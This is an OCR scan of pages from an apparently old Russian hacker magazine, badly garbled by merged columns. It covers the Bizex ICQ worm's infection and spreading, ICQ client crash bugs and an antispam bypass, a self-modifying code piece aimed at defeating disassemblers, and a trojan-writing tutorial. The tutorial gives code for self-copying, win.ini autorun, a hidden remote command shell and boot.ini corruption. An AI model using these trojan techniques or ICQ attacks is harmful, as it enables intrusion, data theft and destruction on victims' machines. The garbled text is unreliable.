тер компоненты червя и инсталлиру- 
ет их в систему. 

Для примера возьмем нашумев- 
ший вирус Bizex. Это сообщение по- 
лучили многие пользователи сети 
ICQ: www.jokeworld.xxx/xxx.html :)». 
Для маскировки при просмотре веб- 
сайта пользователю показывается 
содержание интернет-представи- 
тельства "Joe Cartoon" - автора no- 
пулярных американских мультсериа- 
лов. В это время вирус атакует 
компьютер, используя сразу два 
направления. Во-первых, проникая 
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Однако, и памяти мы занимаем ;) 
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Забавный глюк аськи 


„на компьютер без уведомления пользо- 
вателя загружается специальный файл, 
который "докачивает" В тех. 


сквозь брешь в браузере Internet 
Explorer и через дыру в операционной 
системе Windows. Почитать о данных 
отверстиях можно тут: 
www.microsoft.com/technet/treeview/default.asp? 
url=/technet/security/bulletin/MS02-047.asp 
(уязвимость в ослике IE) и тут: 
www.microsoft.com/technet/treeview/default.asp? 
url=/technet/security/bulletin/ms03-Otlasp (оче- 
редная пробоина в операционке от 
Microsoft). 

В результате этих действий Ha 
компьютер без уведомления пользо- 
вателя загружается специальный 
файл, который "докачивает" непосре- 
дственно файл-носитель Bizex (АРТ- 
GETUPD.EXE) и запускает его на вы- 
полнение. После этого Bizex начинает 
процедуру заражения компьютера. 
Для этого он создает папку SYSMON в 
системном каталоге Windows, копирует 
себя в нее под именем SYSMON.EXE и 
прописывается в реестре: 


(HKEY_LOCAL_MACHINE/SOFTWARE/Microso 
ft/Windows/CurrentVersion/Run) 


Таким образом, вирус обеспечивает 
себе автоматический запуск при каж- 
gon загрузке операционной системы. 

По завершении этого процесса Bizex 
начинает процедуру дальнейшего 
распространения по ICQ. Червь изв- 
лекает из себя несколько системных 
библиотек для работы с этим интер- 
нет-пейджером и устанавливает их в 
системный каталог Windows. С их по- 
мощью Bizex получает доступ к спис- 
ку контактов ICQ, отключает запущен- 
ный |СО-клиент, осуществляет самос- 


тоятельное подключение к серверу от 
имени владельца зараженной маши- 
ны и отего имени рассылает по всем 
найденным контактам ссылку на ука- 
занный выше веб-сайт. Важно отме- 
тить, что червь атакует только ориги- 
нальные !СО-клиенты (за исключени- 
ем ICQ2Go), в то время как альтерна- 
тивные пейджеры (Miranda, Trillian) не 
поддаются атаке. Кроме того, Bizex ус- 
пешно воровал конфиденциальную 
информацию с зараженных компью- 
теров: собирал информацию об уста- 
новленных платежных системах, пе- 
рехватывал данные, передаваемые с 
компьютера по протоколу НТТР5. 

Ты спросишь: «Как червь от моего 
имени может рассылать сообще- 
ния?» Давай попробуем разобраться. 
В сети можно найти такую библиоте- 
ку - ICQAPI.dll. Она содержит в себе 
набор необходимых функций для ра- 
боты с аськой. Именно ее червь ска- 
чивает и устанавливает на компью- 
тер для дальнейшего своего распро- 
странения. 

Иначе говоря, ICQ API - набор сфунк- 
ций, содержащийся в DLL. API позво- 
ляет асинхронизирвать процессы зап- 
роса данных от !СО-клиента, выполне- 
ния первоначальных действий в кли- 
енте и получения сообщения от кли- 
ента. Чтобы использовать API, прило- 
жение должно в начале вызвать один 
раз функцию ICQAPICALL_SETLI- 
CENSEKEY. Только после этого возмо- 
жен вызов остальных функций. ICQ 
АР содержит вызовы и сообщения 
(уведомления). Все вызовы синхрони- 
зированы с блокировкой по времени 
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в 1 секунду (timeout) таким образом, 
что если ICQ клиент не ответил за 1 се- 
кунду, то запрос расценивается как 
невыполненный. Каждый запрос 
возвращает булево значение - FALSE 
или TRUE в зависимости от его невы- 
полнения/выполнения соответствен- 
но. Сообщения отсылаются от ICQ- 
клиента, и они тоже синхронизирова- 
ны с блокировкой по времени в 1 се- 
кунду: если приложение не ответило 
за это время, то сообщение не отосла- 
но и приложение больше никаких со- 
общений не получит. 

Вот несколько срункций, которые 
стороннее приложение может исполь- 
зовать для работы с ICQ: 

ICQAPICall_GetOnlineListDetails - 
функция, которая возвращает список 
юзеров из твоего контакт-листа, 
находящихся в данный момент в он- 
лайне. 

ICQAPICall_GetOnlineListType - функ- 
ция, которая возвращает код состоя- 
ния отображения контакт-писта (0 - 
обычный вид, 1 - разбитие на группы). 
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ICQAPICall_SetOwnerState - функ- 
ция, которая устанавливает статус 
1СО-клиента, например: 


BICQAPI_USER_STATE_ONLINE 0 
BICQAPI_USER_STATE_CHAT 1 
BICQAPI_USER_STATE_AWAY 2 
BICQAPI_USER_STATE_NA 3 
BICQAPI_USER_STATE_OCCUPIED 4 
BICQAPI_USER_STATE_DND ) 
BICQAPI_USER_STATE_INVISIBLE 6 
BICQAPI_LUSER_STATE_OFFLINE 7 


ICQAPICall_SendMessage - функция, 
которая может быть использована 
для рассылки сообщения пользовате- 
NAM из контакт-листа с предложением 
посетить враждебный сайт. 


А ДАВАЙТЕ ПОВЕСИМ 
КЛИЕНТА? 

m Все мы знаем, что можно прислать 
товарищу свой контакт-лист. Но мало 
кто знает, что этот безобидный пере- 
чень контактов может намертво пове- 
сить !СО-клиента. Пакет контакт-листа 
формируется следующим образом: 
вначале идет количество передавае- 


IPDFlood 


мых уинов, а после - список вида Nick -> 
UIN. Если «подправить» пакет таким об- 
разом, чтобы количество передавае- 
мых уинов было равно 65535 (OxFFFF), 
то клиент, которому передается «под- 
правленный пакет», наглухо виснет. 
Происходит это, по-видимому, из-за то- 
го что аська выделяет память для обра- 
ботки полученных адресов исходя из 
количества присланных уинов. Что из 
этого может получиться? Да все что 
угодно: аська может выпасть, может за- 
виснуть, может выделить много памяти 
и впасть в прострацию. Последствия та- 
кой атаки будут варьировать от пере- 
загрузки до переустановки клиента. 
Есть в ICQ интересная фича, называ- 
емая email-express. Если послать пись- 
мо на адрес [uin]@pager.icq.com, то оно 
в виде сообщения будет доставлено на 
YUH, который мы указали. Пакет qpop- 
мируется в виде строки, содержащей 
ник, YUH, емэйл, тест етай-ехргез5'а. 
Разделяются они символом «tO» 
(ОХЕЕ). Если этот пакет сформирован 
некорректно, а именно, количество 
разделителей не соответствует коли- 
честву полей (например, в строку напи- 
хано 100 символов «Ю»), то аська при 
получении подобного пакета начинает 
глючить, а в перспективе - умирает. 
Большинство подобных багов, правда, 
исправлено в последних версиях ICQ. 


Я ОТ ИВАНА ПЕТРОВИЧА... 

m Как часто у тебя в асе выскакива- 
ло сообщение: «Привет! Я Маша (Зина, 
Клава)! Я доярка из деревни Гадюки- 
но, мне одиноко и скучно в деревне с 
коровами! Поэтому я фоткаюсь с ними 
голой и выложила свои сотки на сайт 
\млмм/.гпазВагееехх. 1»? Что, часто? 
В данном случае мы имеем дело с ICQ- 
спамом, между прочим, весьма 90ход- 
ным видом бизнеса ;). Конечно, пользо- 
ватели пытаются с ним бороться: сна- 
чала просто снимают галочку в наст- 
ройках, которая показывает статус кли- 
ента в сети ICQ, поскольку многие 
спам-программы отсылают сообщения, 
если клиент в онлайне. Затем включа- 
ют антиспам-сфильтр, следящий за при- 
емом сообщений от респондентов не 
из контакт-листа. Однако злые взлом- 
щики нашли способ обойти это препят- 
ствие. Комбинация проста и изящна: 
во-первых, отправляем пользователю 
сообщение, чтобы оказаться у него в 
«Not in list», затем отправляем клиенту 
сервисное сообщение, суть которого 
сводится к следующему: «Спасибо, что 
вы меня авторизовали». Аська клиента 
по своей наивности полагает, что раз- 
решение на авторизацию действитель- 
но было дано пользователем и добав- 
ляет нас в контакт-лист жертвы. И ни- 
какие антиспам-сфильтры нам более не 
помеха. 


Автор благодарит payhash'a (www.aol- 
hackers.ru) & VKE (vke.ru) за помощь в 
подготовке статьи и проявленную стой- 
кость и терперние в этом деле :). 
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КРАТКИЙ ЭКСКУРС В ТРОЯНМЕЙКИНГ 


ще со времен появления первых персональных компьютеров стали возникать вредоносные программы - вирусы. 
Из-за того что сеть в те времена была большой редкостью, паразиты перебирались с компьютера на компьютер на 
различных носителях, маскируясь под интересные игры или полезные утилиты. 


ЧТО ЕСТЬ ТРОЯН? 


и Давным-давно под 


трояном понимали 


просто злобную прог- 


Запуск 


рамму, которую распро- 
страняли на различных носителях ин- 
@рормации. При помощи социальной 
инженерии пользователя заставляли 
запустить ее. Последствия запуска 
троянатогда были отформатирован- 
ный жесткий диск, испорченная систе- 
ма, стертые срайлы и многое-многое 
другое. Воровать в то время было 
особо нечего, и основной сфункцией 
троянов были деструкция и приколы. 

Шло время, технологии развива- 
лись и становились все более доступ- 
ными, и вскоре на свет появились 
первые наброски клиент-серверных 
троянов, управляемых через TCP/IP 
удаленно. Распространялись они по- 
прежнему на различных носителях, а 
также по интернету и по e-mail (nog 
видом всяческих твикеров системы, 
крякеров интернета и коллекций пор- 
но). Новое поколение троянов умело 
не только форматировать жесткий 
диск, HO и тащить с компьютера PWL, 
ICQ ЧМ, а затем и пароли из различ- 
ных почтовых программ, кошельки с 
е-деньгами. Затем к некоторым троя- 
нам подключилась функция самора- 
спространения, трояны стали созда- 
ваться, в большинстве случаев, для 
каких либо конкретных заданий, что 
позволяло уменьшить до предела 
размер сервера с целью облегчения 
его впаривания. Что проще: передать 
по e-mail 300 Кб или 5 Кб? 

На что же направлено действие сов- 
ременных троянов? В первую оче- 
редь, конечно на кражу конфиденци- 


ВАТ’ника прошел успешно 
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альной информации. В понятие «кон- 
фиденциальная информация» входят 
не только пароли RAS, ICQ, IRC, 
E-MAIL, NetBIOS, FTP, SHELL, но и цен- 
ные документы: данные о кредитной 
карте, копии паспорта и прочие важ- 
ные сведения, которые можно полу- 
чить из файлов, сохраненных на 
компьютере. Пример такого трояна 
был рассмотрен в Спеце #1.2003(36), 
посвященному кардингу, и умело на- 
ше творение (теоретически) утягивать 
\М/М-кошелечек у неумного, но богато- 
го пользователя. 

Эксперт компьютерной вирусологии 
Евгений Касперский в своей книге 
«Компьютерные вирусы» дал такое 
определение трояну: «К троянским ко- 
ням относятся программы, наносящие 
какие-либо разрушительные действия, 
то есть в зависимости от каких-либо 
условий или при каждом запуске 
уничтожающие информацию на дис- 
ках, "завешивающие" систему и т.п.». 


СДЕЛАЙ САМ? 

m Написание подобных программ 
грозит проблемами с законом по 
статье 273 УК РФ. Мы не несем ника- 
кой ответственности за действия чи- 


Многофункциональный троян Sub-7 


тателя, которые он может свершить 
под влиянием этой статьи. Однако в 
образовательных целях мы все же 
приведем некоторые участки кода. 

Во-первых, несмотря на предельную 
простоту нашей программки она будет 
клиент-серверной. Писать мы будем в 
VC++ и для начала создадим два ‹фай- 
ла - сервер и клиент. Сервер, разуме- 
ется, надо ваять безо всякой визуали- 
зации ;). Состояния проектов сразу же 
поменяем Ha Release. Подключим к 
ним winsock32.dll и дфункции WIN API 
для работы с сокетами и Henocpeg- 
ственной связи клиента с сервером 
посредством ТСР-Р. Последнее легко 
сделать, вписав в код две следующие 
строчки: 


WSADATA wsaData; 
WSAStartup(MAKEWORD(2,2), &wsaData); 


Ho об этом чуть позже, a пока перед 
нами стоят две проблемы - прописать 
сервер в автозагрузку и сделать так, 
чтобы при запуске он автоматически 
переписался в свою директорию. 

Для выполнения копирования goc- 
таточно узнать текущее положение, 
вызвав функцию 


GetModuleFileName(NULL, bufi, size- 
of(bufl)), после чего начать процесс 
копирования: «CopyFile(bufl, 
sti.full_exe_name, FALSE)». «FALSE» 
означает, что, если файл существует, 
он не будет перезаписан. Оно и пра- 
вильно: зачем сто раз переписывать 
себя; тем более, если файл уже запу- 
щен откуда надо, попытка стереть его 
может вызвать ошибку, которая нас- 
торожит пользователя. 

Теперь разберемся с автозагрузкой 
(подробнее данный вопрос рассмот- 
рен в соответствующей статье этого 
Спеца). В принципе, если троян созда- 
ется для того, чтобы получить необхо- 
димые данные один раз, и дальше его 
использовать не планируется, эта 
функция не требуется: получил паро- 
ли - отправил - самоуничтожился. 
Для долгоиграющей зло-проги можно 
использовать функции записи в ре- 
естр (RUN), а можно прописать файл 
в мтпГили system.ini. Сегодня мы 
предпочтем запись в *.ini, и, чтобы 
файл загрузился этим способом, в 
секции [windows] достаточно напи- 
сать гип и полный путь к файлу, что 
можно провернуть с помощью одной 
простой системной команды echo. Вы- 
зываем команду «echo [windows] > 
C:\Windows\win.ini» и «echo run 
C:\Windows\system\trojan.exe». При 
этом делаем проверку на наличие их, 


РАСШИФРОВКА ХЭШЕЙ ПАРОЛЕЙ 


иначе наш троян с каждым разом бу- 
дет запускаться все больше раз, что 
нам совершенно не нужно. 

С системной частью закончили, те- 
перь приступим к работе с сокетами. 


Далее нам надо как-то совместить 
свойства сокета (порт и т.д.) с самим 
сокетом. Сделать это можно так: 


Таким образом, если порт уже ис- 
пользуется или возникли другие 
проблемы с сокетом, «return О» закро- 
ет функцию, которая работает с ними, 
а поскольку она у нас единственная, 
бедняга сервер просто склеится :). 

Завершающим аккордом будет отк- 
рытие порта: 


1 243 
2 38 

$) 129 
4 196 
5 57 

6 134 
iG 219 
8 146 
9 ЩЕ] 
10 163 
Ш 185 
12 230 
13 83 
14 122 
15 149 
16 124 


Здесь цифрой 1 обозначено допус- 
тимое количество коннектов. Быва- 
ет, соединения завершаются некор- 
ректно, например, при неожиданном 
отключении от интернета, и в этом 
случае часто создается ситуация, 
что сервер как бы поддерживает 
процесс соединения, которого нет, и 
при очередной попытке подсоеди- 
ниться - эффект известен ;). Во из- 
бежание этого надо ввести тайм-аут 
на соединение. Далее необходимо 
позаботиться о том, чтобы команды 
принимались постоянно и чтобы 
сервер после исполнения получен- 
ного не вырубался, а отправлял но- 
вый сокет (обзовем его new_sock), 
для чего засунем разрешающую 
коннект функцию accept в так назы- 
ваемый CommandLoop. 

Самой удобной структурой коман- 
ды для многозадачного трояна бу- 
дет такая: «имя_команды парамет- 
ры». Таким образом, для начала на- 
go определиться, какие команды бу- 
дет выполнять наш сервер. Давай 
условимся, что он будет выполнять 
команды ста.ехе, вызывая его, и 
записывать в C:\boot.ini всякую 
чушь (деструктивное действие :)). 
Пусть началом команды ста.ехе 
«команда» будет «с», а функция 
порчи boot.ini - завязана на «f». 
Для приема нам понадобится соз- 
дать еще одну функцию, назовем 
ее гесу (сокращение от recive), кото- 
рая будет принимать команды из 
new_sock и выполнять их. В ней соз- 
дадим два буфера: один размером 2 
байта, в который будет записывать- 
ся первый символ: с или № и второй 
размером 126 байт, в который будет 
записываться параметр функции. 
Например, если мы передадим «с 
notepad.exe», с запишется в буфер 
1, сравнится с имеющимися в нали- 
чии обозначениями команд, обнару- 
жится, что это не что иное, как зап- 


рос на выполнение команды, запи- 
санной в следующих 126 байтах, за- 
писанных в buff2[126] (кстати, если 
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Для кодинга 
троянов 
подходит 
почти лю- 
бой язык - 
С, Delphi, VB. 
Кстати, код 
на чистом 
WinAPI - это 
хорошее pe- 
шение. 


Любая 
программа 
(не обяза- 
тельно тро- 
ян) должна 
нести в себе 
новизну, то, 
что ее вы- 
делит среди 
множества 
других. 


ee 
ВИНО 


| 


TULL 
llalalalaledabale 


no 
= 
о 
[= 
=. 
= 
< 
<= 
< 
x 
< 
- 
< 


Ca 


хватать He будет, ты можешь рас- 
ширить буфер), и вызовется коман- 
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ЗЛОБНЫЙ ВАТ’НИК - HET НИЧЕГО ПРОЩЕ! 
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ga cmd.exe /с notepad.exe. По сути, 
системные команды вызываются так: 
ShellExecuteA(NULL, "open", 
"cmd.exe", buf2_cmd, NULL, 
SW_HIDE). 

Можно было пренебречь вызовом 
cmd.exe с флагом и вместо cmd.exe 
написать notepad, но предложен- 
ный мной принцип тебе пригодится 
для написания дальнейших функ- 
ций (каких именно, нетрудно по- 
нять из других статей номера). Осо- 
бое внимание стоит уделить пара- 
метру SW_HIDE: именно он помога- 
ет скрыть от глаз юзера действия 
программы (в данном случае - отк- 
рытие окна cmd.exe). 


Используй 
полученную 
из статьи 
информа- 
цию только 
для образо- 
вательных 
целей. 
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СОВАМ - СОЗДАТЕЛЬ НЕБЕЗЫЗВЕСТНОГО ТРОЯНА 
LD.PINCH. 


ATAKA HA WINDOWS 


Итак, создаем срайл Troj.bat, открыва- 
ем его на редактирование и вбиваем в 
него то, что можно увидеть во врезке. 

Отдельное внимание стоит уделить 
"компилированию" батника. Ты удив- 
ляешься, что это возможно? В сети 
существует множество программ, поз- 
воляющих превратить текстовый 
срайл сценария, написанный на языке 
BATCH, в сот-файл. Ярким примером 
такой программы является batZexec. 
Работа с ней банально проста: 
bat2exe.com trojan.bat trojan.com. Пос- 
ne этой нехитрой операции появится 
файл trojan.com. Для красоты можно 
можешь переименовать „сот в .ехе: 
смотрится гораздо лучше и привыч- 
нее. Правда, юзер скорее удалит ехе 
файл, чем сот. Пользователи, кото- 
рые фанатеют от MS-DOS или, наобо- 
рот, вообще не знают, что это такое, 
считают сот-файлы системными и бо- 
ATCA их удалять. 5 
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Крис Касперски 


НЕМОЙ YKOP 


ЗА КОМПЬЮТЕРНЫЙ 


ХАРДКОР 


ОСНОВЫ САМОМОДИФИКАЦИИ И САМООБНОВЛЕНИЯ КОДА 


С 


реализаций с каждым годом становится все меньше и меньше. 


амомодифицирующийся код встречается в вирусах, защитных механизмах, сетевых червях, кряксимах и прочих 
программах подобного типа. И хотя техника его создания не представляет большого секрета, качественных 


кутанный мраком тай- 


ны, окруженный нево- 


образимым количест- 


вом мифов, загадок и 


легенд, самомодифици- 
рующийся код постепенно уходит в 
прошлое. Расцвет эпохи самомодиои- 
кации уже позади. Во времена неинте- 
рактивных отладчиков типа debug.com 
и пакетных дизассемблеров типа 
Sourcer самомодисфикация действи- 
тельно серьезно затрудняла анализ, 
однако с появлением РА PRO и 
Turbo-Debugger все изменилось. 
Самомодиорикация не препятствует 
трассировке, и для отладчика она пол- 
ностью прозрачна. Со статическим 
анализом дела обстоят несколько 
сложнее. Дизассемблер отображает 
программу в том виде, в котором она 
была получена на момент снятия дам- 
па или загрузки исходного файла, рас- 


считывая на то, что ни одна из машин- 
ных команд не претерпит изменений в 
ходе своего выполнения. В противном 
случае реконструкция алгоритма бу- 
дет выполнена неверно, и хакерский 
корабль при спуске на воду даст ко- 
лоссальную течь. Однако, если сракт 


самомодисрикации будет обнаружен, 
скорректировать дизассемблерный 
листинг не составит большого труда. 

Давай взглянем на пример с рис. 1. 
Проанализируем выделенные строки. 
Сначала программа обнуляет регистр 
ЕАХ, устанавливая срлаг нуля, а за- 
тем, если он взведен (а он взведен!), 
переходит к метке fack_away. На са- 
мом же деле, все происходит с точ- 
ностью до наоборот. Мы упустили од- 
ну деталь. Конструкция "INC BYTE 
PRT DS:[FACK_ME]" инвертирует ко- 
манду условного перехода, и вместо 
метки fack_away управление получает 
процедура protect_proc. Блестящий 
защитный пример, не правда ли? 

А что если расположить эту инструк- 
цию совсем в другой ветке програм- 
мы, подальше от модифицируемого 
кода? С другим дизассембпером такой 
фокус, может быть, и прокатит, но 
только He CIDA PRO! Взгляни на ав- 
томатически созданную ей перекрест- 
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ную ссылку, ведущую непосредствен- 
но к строке "INC BYTE PTR 
LOC_4O100F" (рис. 2). 

Самомодисфикация в чистом виде 
ничего не решает, и, если не предпри- 
нять дополнительных защитных мер, 
ее участь предрешена. Лучше всего 
поможет в борьбе с перекрестными 
ссылками учебник по математике за 
первый класс, кроме шуток! Простей- 
шие арифметические операции с ука- 
зателями ослепляют автоматический 
анализатор IDA PRO, и перекрестные 
ссылки бьют мимо цели. Обновленный 
вариант самомодисдфицирующегося ко- 
да может выглядеть, как на рис. 3. 

Что здесь происходит? Первым де- 
лом в регистр ЕАХ загружается сме- 
щение модифицируемой команды, 
увеличенное на некоторую величину 
(условимся называть ее дельтой). 
Важно понять, что эти вычисления 
выполняются транслятором еще на 
стадии ассемблирования и в машин- 
ный код попадает только конечный 
результат. Затем из регистра ЕАХ вы- 
читается дельта, корректирующая 
"прицел" и нацеливающая ЕАХ непос- 
редственно на модифицируемый код. 
При условии что дизассемблер не со- 
держит в себе эмулятора ЦП и не 
трассирует указатели (а РА РКО не 
делает ни того, ни другого), он созда- 
ет единственную перекрестную ссыл- 
ку, которая направлена на подлож- 
ную мишень, расположенную далеко 
от театра боевых действий и никак не 
связанную с самомодифицирующим- 
ся кодом. Причем, если подложная 
мишень будет расположена в облас- 
ти, лежащей за пределами [Image 
Base; Image Base + Image Size], ne- 
рекрестная ссылка вообще He будет 
создана! На рис. 4 можно видеть лис- 
тинг, выданный IDA PRO. 

Сгенерированная перекрестная 
ссылка ведет в глубину библиотечной 
функции _printf, случайно оказавшей- 
ся на этом месте. Сам же модифици- 
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руемый код ничем не выделяется на 
фоне остальных машинных команд, и 
взломщик будет абсолютно уверен, 
что здесь находится именно "JZ", а не 
"JNZ"! Естественно, в данном случае 
это не сильно усложнит анализ, ведь 
защитная процедура (protect_proc) 
торчит у хакера под самым носом и он 
обязательно полюбопытствует. OgHa- 
ко, если подвергнуть самомодисрика- 
ции алгоритм проверки серийных но- 
меров, заменяя ROR на ROL, взлом- 


щик будет долго материться, удивля- 
ясь, почему его хакерский генератор 
не срабатывает. А когда запустит от- 
ладчик, будет ругаться еще больше, 
поскольку обнаружит, что его поиме- 
ли, незаметно заменив одну машин- 
ную команду на другую. Большинство 
взломщиков, кстати, именно так и пос- 
тупают - запрягают отладчик и дизас- 
семблер в одну упряжку. 

Более прогрессивные защитные тех- 
нологии базируются на динамической 


шифровке кода. А шисфровка - это, 
по сути, одна из разновидностей са- 
момодисфикации. Очевидно, что 
вплоть gO того момента пока двоич- 
ный код не будет полностью расшиф- 
рован, для дизассемблирования он 
останется непригоден. А если рас- 
шиффровщик доверху нашпигован ан- 
тиотладочными приемами, непосред- 
ственная отладка становится невоз- 
можной также. 

Статическая шифровка (характерная 
для большинства навесных протекто- 
ров) в настоящее время признана со- 
вершенно бесперспективной. Дождав- 
шись момента завершения расшиср- 
ровки, хакер снимает дамп и затем ис- 
следует его стандартными средствами. 
Естественно, защитные механизмы так 
или иначе пытаются этому противосто- 
ять. Они искажают таблицу импорта, 
затирают РЕ-заголовок, устанавлива- 
ют атрибуты страниц в NO_ACCESS, 
однако опытных хакеров такими ‹фоку- 
сами надолго не остановишь. Любой, 
даже самый изощренный, навесной 
протектор вручную снимется без тру- 
да, а для некоторых имеются и автома- 
тические взломщики. 

Ни в какой момент времени весь код 
программы не должен быть расшиср- 
рован целиком! Возьми себе за пра- 
вило, расшифровывая один фраг- 
мент, зашифровывать другой. Причем 
расшифровщик должен быть скон- 
струирован так, чтобы хакер не мог 
использовать его для расшифровки 
программы. Это типичная уязвимость 
большинства защитных механизмов. 
Хакер находит точку входа в расшиф- 
ровщик, восстанавливает его прото- 
тип и пропускает через него все за- 
шисфрованные блоки, получая на вы- 
ходе готовый к употреблению дамп. 
Причем, если расшисфровщик npegc- 
тавляет собой тривиальный ХОК, ха- 
керу будет достаточно определить 
место хранения ключей, а расшифро- 
вать программу он сможет и сам. 

Чтобы этого не случилось, защитные 
механизмы должны использовать по- 
лиморорные технологии и генераторы 
кода. Автоматизировать расшифровку 
программы, которая состоит из нес- 
кольких сотен сфрагментов, зашифрро- 
ванных сгенерированными "на лету" 
крипторами, практически невозможно. 
Однако и реализовать подобный за- 
щитный механизм отнюдь не просто. 
Впрочем, прежде чем ставить перед 
собой грандиозные цели, давай лучше 
разберемся с основами. 


ПРИНЦИПЫ ПОСТРОЕНИЯ 
САМОМОДИФИЦИРУЮЩЕГОСЯ 
КОДА 

Ранние модели процессоров х86 
не поддерживали когерентности ма- 
шинного кода и не отслеживали по- 
пыток модификации команд, уже на- 
ходящихся на конвейере. С одной 
стороны, это усложняло разработку 
самомодифицирующегося кода, с 
другой - позволяло одурачить от- 
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Самомоди- 
фицирую- 
щийся код 
возможен 
только на 
компьюте- 
рах Фон- 
Неймоновс- 
кой архи- 
тектуры 
(одни и те 
же ячейки 
памяти в 
различное 
время могут 
трактовать- 
ся и как 
код, и как 
данные). 


Представи- 
тели про- 
цессоров 
племени 
Pentium в 
действи- 
тельности 
построены 
по Гавар- 
дской архи- 
тектуре 
(код и дан- 
ные обраба- 
тываются 
раздельно) 
и Фон-Ней- 
моновскую 
они только 
эмулируют, 
поэтому са- 
момодифи- 
цирующий- 
ся код рез- 
ко снижает 
их произво- 
дитель- 
ность. 
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nagunk, работающий в трассирую- 
щем режиме. 

При прогоне программы на живом 
процессоре инструкция INC AL заме- 
няется МОР’'ом, однако, поскольку INC 
AL уже находится на конвейере, ре- 
гистр AL все-таки увеличивается на 
единицу. Пошаговая трассировка 
программы ведет себя иначе. Отла- 
дочное исключение, сгенерирован- 
ное непосредственно после выполне- 
ния инструкции STOSB, очищает кон- 
вейер, и управление получает уже не 
INC AL, а МОР, вследствие чего уве- 
личения регистра AL не происходит! 
Если значение АЁ используется для 
расшифровки программы, то отлад- 
чик скажет хакеру: [censored]! Про- 
цессоры семейства Pentium отслежи- 
вают модификацию команд, уже на- 
ходящихся на конвейере, и потому 
программная длина конвейера равна 
нулю. Как следствие, защитные меха- 
низмы конвейерного типа, попав на 
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Фанаты Ас- Pentium, ошибочно полагают, что 
семблера всегда исполняются под отладчиком 
уверяют, 9 9 9 . 
что он под- Это вполне документированная осо- 
держивает бенность поведения процессора, ко- 
самомоди- 
фицирую- торая сохранится и в последующих 
щийся коб. моделях. Использование самомоди- 
и. сфицирующегося кода с формальной 
мблера нет точки зрения вполне законно. OgHa- 
никаких ‘= 
ко следует помнить, что злоупотреб | | 

средств для 
работы с ление им отрицательно влияет на | | 
а: производительность защищаемого 

Е приложения. Кодовый кэш первого - 
щимся ко 
дом, кроме уровня доступен только на чтение, и Исполняемый код может быть расположен в 
BE. Taxan, е = Прямая запись в него невозможна. любой доступной области памяти - стеке, 
позволения При модификации машинных команд 
т в памяти, в действительности моди- куче, области глобапы 1ых переменных и т.(. 


Ka" есть и в 
Си! 


Для написа- 
ния самооб- 
новления по 


фицируется кэш данных! Затем про- 
исходят экстренный сброс кодового 
кэша и перезагрузка измененных 
кэш-пинеек, на что расходуется goc- 
таточно большое количество процес- 
сорных тактов. Никогда не выполняй 
самомодифицирующийся код в глу- 
боко вложенном цикле, если, конеч- 


исполнения для них полностью экви- 
валентны. 

Исполняемый код может быть рас- 
положен в любой доступной области 
памяти - стеке, куче, области гло- 
бальных переменных и T.g. Стек с ку- 


ремещаемым, то есть сохраняющим 
свою работоспособность независимо 
от текущего местоположения в памя- 
ти. Код, сгенерированный компилято- 
ром, в общем случае таковым не яв- 
ляется, что вынуждает нас спускаться 


интернету но, ты не хочешь затормозить ско- чей по умолчанию доступны для запи- начисто ассемблерный уровень. Ка- 
ры рость своей программы go скорости си и вполне пригодны оля размеще- менный век! Неужели до сих пор прог- 
представле- асфальтового катка. ния самомодифицирующегося кода. раммисты не додумались до более 
НЕ Sipe Ходят слухи, что самомодифицирую- = Константные глобальные и статичес- прогрессивных методик?! А как же! 
ние функ- щийся код возможен только в MS- кие переменные обычно размещают- Давай для разнообразия попробуем 
eats aii DOS, a в Windows - нет. Доля истины в ся в секции .rdata, доступной только создать простейшую зашифрован- 
SAE этом есть, но при желании мы можем на чтение (и, разумеется, на исполне- ную процедуру, написанную пол- 
повредит. обойти все запреты и ограничения. ние), и всякая попытка их модисика- ностью на языке высокого уровня 


Прежде всего, разберемся с атрибута- 
ми доступа к страницам и сегментам. 
Процессоры х86 поддерживают три 
атрибута для доступа к сегментам 


ции завершается исключением. 
Таким образом, все, что нам нужно, 

- это скопировать самомодифицирую- 

щийся код в стек (кучу), где он смо- 


(например, Си, хотя те же самые прие- 
мы пригодны и для Паскаля с его 
уродливым родственником Delphi). 
При этом мы будем исходить из cnegy- 


Исходники и (чтение, запись и исполнение) и два - жет харакирить себя как захочет. ющих предположений: а) порядок 


г 5 - й ме- й - 
Gaui к страницам (доступ и запись). Опера Самомодифицирующийся код заме азмещения сфункций в памяти совпа 
статьи ты ционные системы семейства Windows няет машинную команду "ADD" на дает с очередностью их объявления в 
т совмещают кодовый сегмент с сегмен- "SUB", а "5ЦВ" на "ADD", и потому программе (практически все компиля- 

Tb HH ~ 
apo том данных в едином адресном прост- циклический вызов функции торы так и поступают); 6) шифруемая 


ранстве, а потому атрибуты чтения и 
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self_mod_code возвращает следую- 
щую последовательность чисел: "Об 
02 06 02...", подтверждая тем са- 
мым успешное завершение акта са- 
момодисикации. 

Некоторые находят предложенную 
технологию слишком громоздкой. Не- 
которых возмущает то, что копируе- 
мый код должен быть полностью пе- 


функция не содержит перемещаемых 
элементов, также называемых Йх- 
ир'ами или релокациями (это справед- 
ливо для большинства исполняемых 
файлов, но динамическим библиоте- 
кам без релокаций никуда). 

Для успешной расшифровки про- 
цедуры нам необходимо определить 
стартовый адрес ее размещения в 


памяти. Это легко. Современные язы- 
ки высокого уровня поддерживают 
операции с указателями на функ- 
цию. На Си/Си++ это выглядит приб- 
лизительно так: "Void *р;р = (void*) 
func;". Сложнее измерять длину 
функции. Легальные средства языка 
не предоставляют такой возможнос- 
ти, и приходится хитрить, определяя 
длину как разность двух указателей: 
указателя на зашифрованную функ- 
цию и указателя на функцию, pacno- 
ложенную непосредственно за ее 
концом. Разумеется, если компилято- 
ру захочется нарушить естествен- 
ный порядок следования функций, 
этот прием не сработает и расшиф- 
ровка пойдет прахом. 


И последнее. Ни один из всех изве- 


стных мне компиляторов не позво- 
ляет генерировать зашифрованный 
код, и эту операцию приходится осу- 
ществлять вручную - с помощью 


HIEW'a или своих собственных ути- 
лит. Но как мы найдем шифруемую 
функцию в двоичном файле? 
Взломщики используют несколько 
конкурирующих способов, в зависи- 
мости от ситуации отдавая предпоч- 
тение то одному, то другому. 

В простейшем случае шифруемая 
функция окантовывается маркерами 


- уникальными байтовыми последова- 


тельностями, гарантированно не 
встречающимися в остальных частях 
программы. Обычно маркеры задают- 
ся с помощью директивы _emit, 
представляющей собой аналог ассе- 
мблерного ОВ. Например, следующая 
конструкция создает текстовую стро- 
ку "КРМС" -__asm_emit 'К' asm 
emit 'Р' __азт _етй '№!' __азт _етй 


'С'. Только не пытайся располагать 
маркеры внутри шифруемой ‹функ- 
ции. Процессор не поймет юмора и 
выплюнет исключение. Накалывай 


